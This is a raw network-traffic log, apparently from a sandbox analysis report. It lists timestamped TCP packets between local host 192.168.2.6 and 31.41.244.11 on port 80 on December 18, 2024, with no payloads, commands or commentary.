                                                                                                                                                              Dec 18, 2024 11:47:29.256081104 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.256108046 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.256758928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.256817102 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.256829023 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.256851912 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.256851912 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.256927013 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.258071899 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.258160114 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.258172989 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.258236885 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.258244991 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.258289099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.258841038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.258866072 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.258877993 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.258897066 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.258897066 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.258970976 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.259340048 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.259361029 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.259371996 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.259407043 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.259429932 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.259937048 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.260019064 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.260030985 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.260073900 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.260123968 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.260802031 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.260812998 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.260824919 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.260871887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.260871887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.261702061 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.261894941 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.261905909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.261918068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.261965990 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.261965990 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.262655973 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.262666941 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.262681007 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.262733936 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.262733936 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.263462067 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.263473988 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.263485909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.263504028 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.263535976 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.264250040 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.264261961 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.264275074 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.264309883 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.264347076 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.265156984 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.265168905 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.265186071 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.265203953 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.265455961 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.265925884 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.265938044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.265949965 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.265995026 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.265995026 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.266710043 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.266767979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.266778946 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.266782045 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.266819954 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.266819954 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.267519951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.267533064 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.267544985 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.267571926 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.267596006 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.268276930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.268287897 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.268301010 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.268331051 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.268604040 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.269085884 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.269097090 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.269109964 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.269149065 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.269854069 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.269872904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.269885063 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.269916058 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.270663023 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.270673990 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.270685911 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.270721912 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.270721912 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.271383047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.271847010 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.434631109 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.434648037 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.434662104 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.434689999 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.434726000 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.434993029 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.435017109 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.435029984 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.435034990 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.435050011 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.435065985 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.435825109 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.435868025 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.435878038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.435889006 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.435915947 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.435940981 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.436609983 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.436652899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.436682940 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.436695099 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.436733007 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.437400103 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.437439919 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.437443018 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.437454939 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.437475920 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.437500000 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.438303947 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.438316107 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.438353062 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.438368082 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.438440084 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.438481092 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.439188004 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.439199924 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.439227104 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.439239025 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.439275026 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.439307928 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.440102100 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.440145016 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.440157890 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.440191031 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.440222979 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.440759897 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.440804005 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.440824032 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.440834999 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.440857887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.440874100 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.441536903 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.441585064 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.441585064 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.441596985 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.441631079 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.441660881 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.442291975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.442302942 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.442315102 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.442337990 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.442365885 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.443063974 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.443084002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.443094969 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.443123102 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.443145990 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.443948984 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.443960905 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.444000959 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.444102049 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.444166899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.444645882 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.444665909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.444678068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.444693089 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.444704056 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.444720030 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.445513964 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.445525885 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.445538044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.445553064 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.445570946 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.446295023 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.446316957 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.446329117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.446341038 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.446357012 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.447115898 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.447159052 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.447171926 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.447184086 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.447206020 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.447218895 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.448021889 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.448035955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.448046923 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.448076963 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.448101997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.448735952 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.448748112 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.448760033 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.448780060 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.448798895 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.449438095 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.449489117 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.449520111 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.449532986 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.449563980 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.450299978 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.450344086 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.450375080 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.450387955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.450423956 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.451114893 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.451159000 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.451159000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.451172113 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.451195955 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.451208115 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.452008009 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.452024937 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.452037096 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.452059984 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.452081919 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.452894926 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.452915907 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.452941895 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.452953100 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.452969074 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.452980995 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.453016043 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.453855038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.453869104 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.453881979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.453900099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.453917980 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.454511881 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.454549074 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.454567909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.454581022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.454603910 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.454621077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.455388069 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.455401897 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.455471992 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.455499887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.455513000 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.456226110 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.456238031 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.456252098 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.456269026 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.456291914 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.456990957 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.457003117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.457014084 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.457035065 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.457070112 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.457851887 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.457864046 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.457895041 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.457916975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.457954884 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.458586931 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.458599091 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.458611012 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.458635092 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.458658934 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.459358931 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.459404945 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.459434986 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.459446907 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.459470034 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.459506989 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.460127115 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.460167885 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.460170984 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.460184097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.460199118 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.460216999 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.461164951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.461184978 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.461199045 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.461220980 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.461220980 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.461235046 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.461788893 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.461802006 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.461831093 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.461836100 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.461846113 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.461870909 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.462605953 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.462677002 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.625844002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.625859976 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.625871897 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.625987053 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.626116991 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.626163960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.626174927 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.626220942 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.626816988 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.626830101 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.626842022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.626868010 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.626893997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.627616882 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.627628088 CET804983731.41.244.11192.168.2.6
